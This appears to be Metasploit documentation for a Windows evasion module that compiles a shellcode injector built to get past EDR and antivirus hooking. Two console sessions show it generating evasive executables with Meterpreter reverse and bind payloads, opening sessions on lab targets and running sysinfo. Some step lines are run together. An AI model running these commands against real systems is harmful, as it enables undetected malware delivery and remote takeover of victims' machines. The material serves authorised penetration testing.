documentation/modules/evasion/windows/syscall_inject.md
This module lets you create a Windows executable that injects a specific payload/shellcode in memory bypassing EDR/AVs Windows API hooking technique via direct syscalls achieved by Mingw's inline assembly. Mingw needs (x86_64) to be installed on the system and in the PATH environment variable.
The technique used is based on Sorting by System Call Address, by enumerating all Zw* stubs in the EAT of NTDLL.dll and then sorting them by address, it still works even if syscall indices were overwritten by AVs. For more details
steps using a meterpreter/reverse_tcp payload on a 64-bits target:
use evasion/windows/syscall_injectset LHOST <local IP>set payload windows/x64/meterpreter/reverse_tcphandler -p windows/x64/meterpreter/reverse_tcp -H <local IP> -P <local port>runEncryption algorithm used to encrypt the payload. Available ones (CHACHA, RC4)
Filename for the generated evasive file file. The default is random.
Adding random data such as names, emails and GUIDs to the final executable
Specify how much the program sleeps in milliseconds prior to execute the shellcode's thread (NtCreateThread). NOTE: the longer the better chance to avoid being detected.
Optimization level passed to the compiler (Mingw)
msf > use evasion/windows/syscall_inject
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf evasion(windows/syscall_inject) > set SLEEP 10000
SLEEP => 10000
msf evasion(windows/syscall_inject) > set LHOST 192.168.1.104
LHOST => 192.168.1.104
msf evasion(windows/syscall_inject) > run
[+] pYlCSOAeW.exe stored at /Users/user/.msf4/local/pYlCSOAeW.exe
msf evasion(windows/syscall_inject) > cp /Users/user/.msf4/local/pYlCSOAeW.exe ~
[*] exec: cp /Users/user/.msf4/local/pYlCSOAeW.exe ~
msf evasion(windows/syscall_inject) > handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.1.104 -P 4444
[*] Payload handler running as background job 1.
[*] Started reverse TCP handler on 192.168.1.104:4444
msf evasion(windows/syscall_inject) > [*] Sending stage (200262 bytes) to 192.168.1.103
[*] Meterpreter session 3 opened (192.168.1.104:4444 -> 192.168.1.103:53007) at 2021-08-01 17:08:43 +0300
msf evasion(windows/syscall_inject) > sessions -i 3
[*] Starting interaction with 3...
meterpreter > sysinfo
Computer : DESKTOP-822593D
OS : Windows 10 (10.0 Build 19042).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.103 - Meterpreter session 3 closed. Reason: User exit
msf > use evasion/windows/syscall_inject
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf evasion(windows/syscall_inject) > set payload windows/x64/meterpreter_bind_tcp
payload => windows/x64/meterpreter_bind_tcp
msf evasion(windows/syscall_inject) > set RHOST 192.168.225.76
RHOST => 192.168.225.76
msf evasion(windows/syscall_inject) > set LPORT 10156
LPORT => 10156
msf evasion(windows/syscall_inject) > set cipher rc4
cipher => rc4
msf evasion(windows/syscall_inject) > run
[+] ShP.exe stored at /Users/medicus/.msf4/local/ShP.exe
msf evasion(windows/syscall_inject) > cp /Users/medicus/.msf4/local/ShP.exe ~
[*] exec: cp /Users/medicus/.msf4/local/ShP.exe ~
msf evasion(windows/syscall_inject) > handler -p windows/x64/meterpreter_bind_tcp -H 192.168.225.76 -P 10156
[*] Payload handler running as background job 0.
[*] Started bind TCP handler against 192.168.225.76:10156
msf evasion(windows/syscall_inject) > [*] Meterpreter session 1 opened (0.0.0.0:0 -> 192.168.225.76:10156) at 2021-08-01 17:32:05 +0300
msf evasion(windows/syscall_inject) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : LABCE28
OS : Windows 2012 (6.2 Build 9200).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 386
Meterpreter : x64/windows
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.225.76 - Meterpreter session 1 closed. Reason: User exit